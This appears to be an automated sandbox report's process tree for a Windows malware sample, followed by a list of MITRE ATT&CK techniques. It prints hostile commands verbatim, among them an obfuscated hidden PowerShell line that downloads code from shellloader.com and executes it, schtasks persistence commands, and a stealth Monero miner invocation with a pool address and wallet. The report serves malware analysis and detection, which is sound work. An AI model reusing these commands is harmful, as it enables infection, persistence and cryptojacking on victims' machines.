      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      PID:4240
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:5636
  - - C:\Users\Admin\AppData\Roaming\services64.exe
      "C:\Users\Admin\AppData\Roaming\services64.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:4264
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        5⤵
        
        PID:6488
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:7112
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        5⤵
        Executes dropped EXE
        
        PID:6544
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        5⤵
        
        PID:6484
- - C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
    "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4900
  - - C:\ProgramData\4432573.exe
      "C:\ProgramData\4432573.exe"
      4⤵
      Executes dropped EXE
      PID:5672
  - - C:\ProgramData\6490685.exe
      "C:\ProgramData\6490685.exe"
      4⤵
      Executes dropped EXE
      Checks BIOS information in registry
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:4472
  - - C:\ProgramData\2347656.exe
      "C:\ProgramData\2347656.exe"
      4⤵
      Executes dropped EXE
      Checks BIOS information in registry
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:3736
  - - C:\ProgramData\8538837.exe
      "C:\ProgramData\8538837.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:5912
- - C:\Users\Admin\AppData\Local\Temp\2.exe
    "C:\Users\Admin\AppData\Local\Temp\2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4932
  - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:4176
- - C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    - Executes dropped EXE
    PID:1936
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 808
      4⤵
      Program crash
      PID:4344
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 848
      4⤵
      Program crash
      PID:5904
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 884
      4⤵
      Program crash
      PID:5268
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 968
      4⤵
      Program crash
      PID:2756
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 944
      4⤵
      Program crash
      PID:5824
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 988
      4⤵
      Program crash
      PID:5276
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 1092
      4⤵
      Program crash
      PID:4872
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 1084
      4⤵
      Suspicious use of NtCreateProcessExOtherParentProcess
      Program crash
      PID:5544
- - C:\Users\Admin\AppData\Local\Temp\5.exe
    "C:\Users\Admin\AppData\Local\Temp\5.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4848
  - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:2688
- - C:\Users\Admin\AppData\Local\Temp\udptest.exe
    "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
    3⤵
    - Executes dropped EXE
    PID:4612
- - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
    3⤵
    - Executes dropped EXE
    PID:4364
  - - C:\Users\Admin\AppData\Local\Temp\is-FEGPS.tmp\setup_2.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-FEGPS.tmp\setup_2.tmp" /SL5="$40278,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5312
- - C:\Users\Admin\AppData\Local\Temp\3002.exe
    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
    3⤵
    - Executes dropped EXE
    PID:5148
  - - C:\Users\Admin\AppData\Local\Temp\3002.exe
      "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
      4⤵
      Executes dropped EXE
      PID:5364
- - C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
    "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
    3⤵
    - Executes dropped EXE
    PID:5524
- - C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
    "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
    3⤵
    - Executes dropped EXE
    PID:5320
- - C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe
    "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"
    3⤵
    - Executes dropped EXE
    PID:1904
  - - C:\Users\Admin\AppData\Local\Temp\tmp7402_tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp7402_tmp.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:1688
    - - C:\Users\Admin\AppData\Local\Temp\tmp7402_tmp.exe
        
        C:\Users\Admin\AppData\Local\Temp\tmp7402_tmp.exe
        5⤵
        Executes dropped EXE
        
        PID:4884

C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun19de8ff4b6aefeb8.exe
Sun19de8ff4b6aefeb8.exe /mixone
1⤵
- Executes dropped EXE
PID:4508
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 656
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3772
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 672
  2⤵
  - Program crash
  PID:5828
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 632
  2⤵
  - Program crash
  PID:4624
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 640
  2⤵
  - Program crash
  PID:5840
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 896
  2⤵
  - Program crash
  PID:792
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 928
  2⤵
  - Program crash
  PID:3064
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1176
  2⤵
  - Program crash
  - Suspicious use of WriteProcessMemory
  PID:2284
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1140
  2⤵
  - Program crash
  PID:4824
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1288
  2⤵
  - Program crash
  PID:2956
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1280
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  PID:380

C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun1908b94df837b3158.exe
Sun1908b94df837b3158.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4360

C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun193fda712d9f1.exe
Sun193fda712d9f1.exe
1⤵
- Executes dropped EXE
PID:4304

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4452
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3792

C:\Users\Admin\AppData\Local\Temp\is-4MTGP.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4MTGP.tmp\setup_2.tmp" /SL5="$302A8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
1⤵
PID:6052
- C:\Users\Admin\AppData\Local\Temp\is-M01DU.tmp\postback.exe
  "C:\Users\Admin\AppData\Local\Temp\is-M01DU.tmp\postback.exe" ss1
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5164
- - C:\Windows\SysWOW64\explorer.exe
    explorer.exe ss1
    3⤵
    PID:5032
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
      4⤵
      PID:6180
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        5⤵
        Blocklisted process makes network request
        
        PID:6496
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\Sb1taEJRF.dll"
      4⤵
      PID:6268
    - - C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\Sb1taEJRF.dll"
        5⤵
        Loads dropped DLL
        
        PID:5212
      - C:\Windows\system32\regsvr32.exe
        
        /s "C:\Users\Admin\AppData\Local\Temp\Sb1taEJRF.dll"
        6⤵
        
        PID:4844
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\Sb1taEJRF.dllxT7mKOJUO.dll"
      4⤵
      PID:2292
    - - C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\Sb1taEJRF.dllxT7mKOJUO.dll"
        5⤵
        Loads dropped DLL
        
        PID:7504
      - C:\Windows\system32\regsvr32.exe
        
        /s "C:\Users\Admin\AppData\Local\Temp\Sb1taEJRF.dllxT7mKOJUO.dll"
        6⤵
        
        PID:7872

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
1⤵
- Executes dropped EXE
PID:5844

C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun1917b8fb5f09db8.exe
Sun1917b8fb5f09db8.exe
1⤵
- Executes dropped EXE
PID:4172

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
1⤵
- Executes dropped EXE
PID:5676

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
1⤵
- Executes dropped EXE
PID:5896

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5624

C:\ProgramData\8538837.exe
"C:\ProgramData\8538837.exe"
1⤵
PID:6120

C:\ProgramData\8538837.exe
"C:\ProgramData\8538837.exe"
1⤵
- Executes dropped EXE
PID:6056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5912 -s 956
1⤵
- Program crash
PID:5344

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Loads dropped DLL
PID:2676

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:1260

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6164

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5508

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6096

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
PID:7036

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:7296
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 6AFBDB8C7711312CB2810A7C022C88E2 C
  2⤵
  - Loads dropped DLL
  PID:7800
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 760F427DC3083D616DE15591AA719286
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:1440
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:6520
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F8F259E91FB883F92F0A5D098EEBBEA6 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:7632

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:7752
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:7776

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7176

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:5512

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- Loads dropped DLL
PID:4844

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
1⤵
PID:7764
- C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
  C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions
  2⤵
  - Modifies system executable filetype association
  - Adds Run key to start application
  - Modifies Internet Explorer settings
  - Modifies registry class
  PID:5148
- - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe
    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"
    3⤵
    - Loads dropped DLL
    - Modifies registry class
    PID:956

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:7280

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:7804

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4588

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6892

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:4892

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Change Default File Association

T1042

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery